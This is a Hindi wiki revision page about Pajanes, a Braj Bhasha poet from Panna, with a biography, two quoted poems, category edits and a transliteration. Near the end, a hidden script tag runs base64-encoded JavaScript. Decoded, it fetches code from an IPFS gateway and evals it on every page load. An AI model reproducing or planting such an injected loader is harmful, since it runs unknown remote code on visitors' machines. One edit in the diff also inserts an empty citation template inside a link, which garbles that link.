Difference between revisions of "पजनेस"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('पजनेस पन्ना के रहने वाले थे। इनका कुछ विशेष वृत्ता...' के साथ नया पन्ना बनाया)
 
Line 1: Line 1:
पजनेस [[पन्ना]] के रहने वाले थे। इनका कुछ विशेष वृत्तांत प्राप्त नहीं। कविता काल इनका संवत् 1900 के आसपास माना जा सकता है। कोई पुस्तक तो इनकी नहीं मिलती, पर इनकी बहुत सी फुटकल कविता संग्रह ग्रंथों में मिलती और लोगों के मुँह से सुनी जाती है। इनका स्थान [[ब्रजभाषा]] के प्रसिद्ध कवियों में है। 'ठाकुर शिवसिंहजी' ने 'मधुरप्रिया' और 'नखशिख' नाम की इनकी दो पुस्तकों का उल्लेख किया है, पर वे मिलती नहीं। भारत जीवन प्रेस ने इनकी फुटकल कविताओं का एक संग्रह 'पजनेस प्रकाश' के नाम से प्रकाशित किया है जिसमें 127 कवित्त-सवैया हैं। इनकी कविताओं को देखने से पता चलता है कि ये [[फ़ारसी भाषा|फारसी]] भी जानते थे। एक सवैया में इन्होंने फारसी के शब्द और वाक्य भरे हैं। इनकी रचना [[श्रृंगार रस]] की ही है, पर उसमें कठोर वर्णों (जैसे ट, ठ, ड) का व्यवहार यत्र तत्र बराबर मिलता है। ये 'प्रतिकूल वर्णन' की परवाह कम करते थे। पर इसका तात्पर्य यह नहीं कि कोमल अनुप्रासयुक्त ललित भाषा का व्यवहार इनमें नहीं है। पदविन्यास इनका अच्छा है। इनके फुटकल कवित्त अधिकतर अंगवर्णन के मिलते हैं जिससे अनुमान होता है कि इन्होंने कोई नखशिख लिखा होगा। शब्दचमत्कार पर इनका ध्यान विशेष रहता था जिससे कहीं कहीं कुछ भद्दापन आ जाता था।  -  
+
पजनेस [[पन्ना]] के रहने वाले थे। इनका कुछ विशेष वृत्तांत प्राप्त नहीं। कविता काल इनका संवत् 1900 के आसपास माना जा सकता है। कोई पुस्तक तो इनकी नहीं मिलती, पर इनकी बहुत सी फुटकल कविता संग्रह ग्रंथों में मिलती और लोगों के मुँह से सुनी जाती है। इनका स्थान [[ब्रजभाषा]] के प्रसिद्ध कवियों में है। 'ठाकुर शिवसिंहजी' ने 'मधुरप्रिया' और 'नखशिख' नाम की इनकी दो पुस्तकों का उल्लेख किया है, पर वे मिलती नहीं। भारत जीवन प्रेस ने इनकी फुटकल कविताओं का एक संग्रह 'पजनेस प्रकाश' के नाम से प्रकाशित किया है जिसमें 127 कवित्त-सवैया हैं। इनकी कविताओं को देखने से पता चलता है कि ये [[फ़ा{{cite book | last = | first =  | title =  | edition = | publisher = | location =  | language =  | pages =  | chapter =}}रसी भाषा|फारसी]] भी जानते थे। एक सवैया में इन्होंने फारसी के शब्द और वाक्य भरे हैं। इनकी रचना [[श्रृंगार रस]] की ही है, पर उसमें कठोर वर्णों (जैसे ट, ठ, ड) का व्यवहार यत्र तत्र बराबर मिलता है। ये 'प्रतिकूल वर्णन' की परवाह कम करते थे। पर इसका तात्पर्य यह नहीं कि कोमल अनुप्रासयुक्त ललित भाषा का व्यवहार इनमें नहीं है। पदविन्यास इनका अच्छा है। इनके फुटकल कवित्त अधिकतर अंगवर्णन के मिलते हैं जिससे अनुमान होता है कि इन्होंने कोई नखशिख लिखा होगा। शब्दचमत्कार पर इनका ध्यान विशेष रहता था जिससे कहीं कहीं कुछ भद्दापन आ जाता था।  -  
 
<poem>छहरै छबीली छटा छूटि छितिमंडल पै,  
 
<poem>छहरै छबीली छटा छूटि छितिमंडल पै,  
 
उमग उजेरो महाओज उजबक सी।
 
उमग उजेरो महाओज उजबक सी।
Line 19: Line 19:
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 +
{{cite book | last =आचार्य| first =रामचंद्र शुक्ल| title =हिन्दी साहित्य का इतिहास| edition =| publisher =कमल प्रकाशन, नई दिल्ली| location =भारतडिस्कवरी पुस्तकालय | language =हिन्दी | pages =पृष्ठ सं. 271| chapter =प्रकरण 3}}
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
  
 
==संबंधित लेख==
 
==संबंधित लेख==
 
+
{{भारत के कवि}}
[[Category:नया पन्ना]]
+
[[Category:कवि]]
 +
[[Category:रीति_काल]]
 +
[[Category:प्रसिद्ध व्यक्तित्व]]
 +
[[Category:प्रसिद्ध व्यक्तित्व कोश]][[Category:चरित कोश]]
 +
[[Category:साहित्य कोश]]
 
__INDEX__
 
__INDEX__
 +
__NOTOC__

Revision as of 11:22, 11 August 2011

pajanes panna ke rahane vale the. inaka kuchh vishesh vrittaant prapt nahian. kavita kal inaka sanvath 1900 ke asapas mana ja sakata hai. koee pustak to inaki nahian milati, par inaki bahut si phutakal kavita sangrah granthoan mean milati aur logoan ke muanh se suni jati hai. inaka sthan brajabhasha ke prasiddh kaviyoan mean hai. 'thakur shivasianhaji' ne 'madhurapriya' aur 'nakhashikh' nam ki inaki do pustakoan ka ullekh kiya hai, par ve milati nahian. bharat jivan pres ne inaki phutakal kavitaoan ka ek sangrah 'pajanes prakash' ke nam se prakashit kiya hai jisamean 127 kavitt-savaiya haian. inaki kavitaoan ko dekhane se pata chalata hai ki ye [[fa '.rasi bhasha|pharasi]] bhi janate the. ek savaiya mean inhoanne pharasi ke shabd aur vaky bhare haian. inaki rachana shrriangar ras ki hi hai, par usamean kathor varnoan (jaise t, th, d) ka vyavahar yatr tatr barabar milata hai. ye 'pratikool varnan' ki paravah kam karate the. par isaka tatpary yah nahian ki komal anuprasayukt lalit bhasha ka vyavahar inamean nahian hai. padavinyas inaka achchha hai. inake phutakal kavitt adhikatar aangavarnan ke milate haian jisase anuman hota hai ki inhoanne koee nakhashikh likha hoga. shabdachamatkar par inaka dhyan vishesh rahata tha jisase kahian kahian kuchh bhaddapan a jata tha. -

chhaharai chhabili chhata chhooti chhitimandal pai,
umag ujero mahaoj ujabak si.
kavi pajanes kanj manjul mukhi ke gat,
upamadhikati kal kuandan tabak si
phaili dip dip dip dipati dipati jaki.
dipamalika ki rahi dipati dabak si.
parat n tab lakhi mukh mahatab jab,
nikasi sitab aphatab ki bhabhak si

pajanes tasadduk ta bisamil julphash phurakat n kabool kase.
mahaboob chunaan badamast sanam ajashdast alabal julph phanse
majamooe, n kaphashh shigaphashh rue sam kyamat chashm se khooan barase.
mijashgaan surama taharir dutaan nukate, bin be, kin te, kin se


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh


achary, ramachandr shukl “prakaran 3”, hindi sahity ka itihas (hindi). bharatadiskavari pustakalay: kamal prakashan, nee dilli, prishth san. 271.

bahari k diyaan

sanbandhit lekh